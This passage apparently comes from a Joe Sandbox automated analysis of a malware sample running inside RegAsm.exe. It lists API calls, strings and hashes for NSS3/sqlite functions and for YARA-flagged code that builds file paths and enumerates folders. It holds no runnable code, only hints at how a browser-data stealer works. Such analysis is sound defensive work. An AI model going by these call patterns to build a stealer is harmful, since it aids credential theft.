                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: bc593b005046e660d543983a8179fffe2a6b3d6901b7b4fbe858137e5b2c7c07
                                                                                • Instruction ID: a2c3f5444122a725971e4d9bd4bc1fd4f5fd8d6fbdb4b974b2becb1e252410b3
                                                                                • Opcode Fuzzy Hash: bc593b005046e660d543983a8179fffe2a6b3d6901b7b4fbe858137e5b2c7c07
                                                                                • Instruction Fuzzy Hash: 1DF05911F056343FDB004094DC14F823BAD6F0136CF1629B0ED08BBE93EA06F89186E0
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9A4E30
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A4E4D
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C9A4E47
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9A4E38
                                                                                • invalid, xrefs: 6C9A4E25
                                                                                • misuse, xrefs: 6C9A4E42
                                                                                • API call with %s database connection pointer, xrefs: 6C9A4E2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: 993e1cc2b0eda2e3c9f7e500b19c9b671f32c4fe837471e1e0636e20a0ca8211
                                                                                • Instruction ID: 17015beb40b3fb344214c81823c60b372919ce661b74714904955fc3bb30928b
                                                                                • Opcode Fuzzy Hash: 993e1cc2b0eda2e3c9f7e500b19c9b671f32c4fe837471e1e0636e20a0ca8211
                                                                                • Instruction Fuzzy Hash: B1F02E11F455382FD710009DEC14F82379D671136EF2954B1EA0DB7E92DB05D8A246E1
                                                                                APIs
                                                                                • PR_SetError.NSS3(00000000,00000000,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?,?,00000000,?,?), ref: 6C910CB3
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?), ref: 6C910DC1
                                                                                • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?), ref: 6C910DEC
                                                                                  • Part of subcall function 6C930F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C8D2AF5,?,?,?,?,?,6C8D0A1B,00000000), ref: 6C930F1A
                                                                                  • Part of subcall function 6C930F10: malloc.MOZGLUE(00000001), ref: 6C930F30
                                                                                  • Part of subcall function 6C930F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C930F42
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?), ref: 6C910DFF
                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C911444,?,00000001,?,00000000), ref: 6C910E16
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?), ref: 6C910E53
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?,?,00000000), ref: 6C910E65
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?), ref: 6C910E79
                                                                                  • Part of subcall function 6C921560: TlsGetValue.KERNEL32(00000000,?,6C8F0844,?), ref: 6C92157A
                                                                                  • Part of subcall function 6C921560: EnterCriticalSection.KERNEL32(?,?,?,6C8F0844,?), ref: 6C92158F
                                                                                  • Part of subcall function 6C921560: PR_Unlock.NSS3(?,?,?,?,6C8F0844,?), ref: 6C9215B2
                                                                                  • Part of subcall function 6C8EB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C8F1397,00000000,?,6C8ECF93,5B5F5EC0,00000000,?,6C8F1397,?), ref: 6C8EB1CB
                                                                                  • Part of subcall function 6C8EB1A0: free.MOZGLUE(5B5F5EC0,?,6C8ECF93,5B5F5EC0,00000000,?,6C8F1397,?), ref: 6C8EB1D2
                                                                                  • Part of subcall function 6C8E89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8E88AE,-00000008), ref: 6C8E8A04
                                                                                  • Part of subcall function 6C8E89E0: EnterCriticalSection.KERNEL32(?), ref: 6C8E8A15
                                                                                  • Part of subcall function 6C8E89E0: memset.VCRUNTIME140(6C8E88AE,00000000,00000132), ref: 6C8E8A27
                                                                                  • Part of subcall function 6C8E89E0: PR_Unlock.NSS3(?), ref: 6C8E8A35
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 1601681851-0
                                                                                • Opcode ID: 4c7b0083aad7fea1394ac610015e73f0ac5acdd636a70cf53b4556228453fe05
                                                                                • Instruction ID: 74d709556600fe1b4e66d7f41785c0b069ebde62a21e965560bfafef756b59de
                                                                                • Opcode Fuzzy Hash: 4c7b0083aad7fea1394ac610015e73f0ac5acdd636a70cf53b4556228453fe05
                                                                                • Instruction Fuzzy Hash: 7D51E8F5D002055FEB109F68DD82ABF37A8AF15258F151434EC1997B02FB36ED2987A2
                                                                                APIs
                                                                                • sqlite3_value_text.NSS3(?,?), ref: 6C8C6ED8
                                                                                • sqlite3_value_text.NSS3(?,?), ref: 6C8C6EE5
                                                                                • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C8C6FA8
                                                                                • sqlite3_value_text.NSS3(00000000,?), ref: 6C8C6FDB
                                                                                • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C8C6FF0
                                                                                • sqlite3_value_blob.NSS3(?,?), ref: 6C8C7010
                                                                                • sqlite3_value_blob.NSS3(?,?), ref: 6C8C701D
                                                                                • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C8C7052
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                • String ID:
                                                                                • API String ID: 1920323672-0
                                                                                • Opcode ID: 6322a826800139370b2461b0815d9b3e5ec6ad9d55ae93b65c1030d49950183c
                                                                                • Instruction ID: 9cd44f03134ca70ba54b1dbe93c53d105c3d8243b317c0eae589038ee57f523a
                                                                                • Opcode Fuzzy Hash: 6322a826800139370b2461b0815d9b3e5ec6ad9d55ae93b65c1030d49950183c
                                                                                • Instruction Fuzzy Hash: 1A61A1B1F1420A8FDB20CB68DA006FEB7B2AF55308F284575D415AB751E732DC16CBA2
                                                                                APIs
                                                                                • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C937313), ref: 6C938FBB
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C8D8298,?,?,?,6C8CFCE5,?), ref: 6C9307BF
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9307E6
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C93081B
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C930825
                                                                                • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C937313), ref: 6C939012
                                                                                • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C937313), ref: 6C93903C
                                                                                • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C937313), ref: 6C93909E
                                                                                • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C937313), ref: 6C9390DB
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C937313), ref: 6C9390F1
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C937313), ref: 6C93906B
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C937313), ref: 6C939128
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                • String ID:
                                                                                • API String ID: 3590961175-0
                                                                                • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                • Instruction ID: ae3662310ed36b7f6153265d0b989680d6bd6dc816cae19239658e5fdb1b89dc
                                                                                • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                • Instruction Fuzzy Hash: 55519071A00221CFEB109F6ADC84B26B3F9AF54318F165029D95DD7B61EF35E904CBA1
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00416132
                                                                                • lstrcat.KERNEL32(?,?), ref: 00416188
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004161AE
                                                                                • lstrcat.KERNEL32(?,?), ref: 004161CE
                                                                                • lstrcat.KERNEL32(?,?), ref: 004161E2
                                                                                • lstrcat.KERNEL32(?), ref: 004161F5
                                                                                • lstrcat.KERNEL32(?,?), ref: 00416209
                                                                                • lstrcat.KERNEL32(?), ref: 0041621C
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
                                                                                  • Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                  • Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                  • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
                                                                                  • Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                  • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,004268EC), ref: 00415ED6
                                                                                  • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,004268F0), ref: 00415EF0
                                                                                  • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                • String ID:
                                                                                • API String ID: 2058169020-0
                                                                                • Opcode ID: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                • Instruction ID: c8bc0cfaec16e0a9c8e3cc6943dd29f550fca9c9c6472c90ce97e84fdf381955
                                                                                • Opcode Fuzzy Hash: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                • Instruction Fuzzy Hash: A541FEB2D0022DAACF11EBE0DC49EDE77BCAF1D314F4005AAB505E3051EA78D7888B64
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C8F4E90
                                                                                • EnterCriticalSection.KERNEL32 ref: 6C8F4EA9
                                                                                • TlsGetValue.KERNEL32 ref: 6C8F4EC6
                                                                                • EnterCriticalSection.KERNEL32 ref: 6C8F4EDF
                                                                                • PL_HashTableLookup.NSS3 ref: 6C8F4EF8
                                                                                • PR_Unlock.NSS3 ref: 6C8F4F05
                                                                                • PR_Now.NSS3 ref: 6C8F4F13
                                                                                • PR_Unlock.NSS3 ref: 6C8F4F3A
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                • String ID:
                                                                                • API String ID: 326028414-0
                                                                                • Opcode ID: 8167ca546b2609c2160e2254ce6051149693a92f3a669a57b084e81f402b83a1
                                                                                • Instruction ID: ed5b5fa76a4aadba401b57e4cdb825f0927840bf73779837dfbf9d83b501d9af
                                                                                • Opcode Fuzzy Hash: 8167ca546b2609c2160e2254ce6051149693a92f3a669a57b084e81f402b83a1
                                                                                • Instruction Fuzzy Hash: 3A416DB4A047058FDB14DF78C6848AABBF0FF89354B058969DC599B710EB30E856CF91
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
                                                                                • String ID:
                                                                                • API String ID: 4163001165-0
                                                                                • Opcode ID: 9f94db5f4e9717467189212d19372aa53011038b84e482aa4697f0ab5fdd9b21
                                                                                • Instruction ID: abdf2278495424ef7824074ccd11a1d6ef0ee3b8e628fa656d00620c2b7037eb
                                                                                • Opcode Fuzzy Hash: 9f94db5f4e9717467189212d19372aa53011038b84e482aa4697f0ab5fdd9b21
                                                                                • Instruction Fuzzy Hash: C7A1F5716143019BE718DF24CC40BABB3F9EF58308F44492EE94ACB652E731E568C796
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C948C93
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                  • Part of subcall function 6C928A60: TlsGetValue.KERNEL32(6C8D61C4,?,6C8D5F9C,00000000), ref: 6C928A81
                                                                                  • Part of subcall function 6C928A60: TlsGetValue.KERNEL32(?,?,?,6C8D5F9C,00000000), ref: 6C928A9E
                                                                                  • Part of subcall function 6C928A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C8D5F9C,00000000), ref: 6C928AB7
                                                                                  • Part of subcall function 6C928A60: PR_Unlock.NSS3(?,?,?,?,?,6C8D5F9C,00000000), ref: 6C928AD2
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C948CFB
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C948D10
                                                                                  • Part of subcall function 6C928970: TlsGetValue.KERNEL32(?,00000000,6C8D61C4,?,6C8D5639,00000000), ref: 6C928991
                                                                                  • Part of subcall function 6C928970: TlsGetValue.KERNEL32(?,?,?,?,?,6C8D5639,00000000), ref: 6C9289AD
                                                                                  • Part of subcall function 6C928970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C8D5639,00000000), ref: 6C9289C6
                                                                                  • Part of subcall function 6C928970: PR_WaitCondVar.NSS3 ref: 6C9289F7
                                                                                  • Part of subcall function 6C928970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C8D5639,00000000), ref: 6C928A0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                • String ID:
                                                                                • API String ID: 2412912262-0
                                                                                • Opcode ID: 79fd64e06932f31e78b4cb72bbca7f1190c60d12aac613ae7ad1a639c7e603ff
                                                                                • Instruction ID: f2d954f78e3845f79e693915da11ed39fc1dd592a702d5d322ea5299ec0a7603
                                                                                • Opcode Fuzzy Hash: 79fd64e06932f31e78b4cb72bbca7f1190c60d12aac613ae7ad1a639c7e603ff
                                                                                • Instruction Fuzzy Hash: 85B16DB0D043089FDB19CF65DC40AAEB7BAEF58308F14812ED81AA7751E731E955CB94
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004074E7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004077B3
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004077C7
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
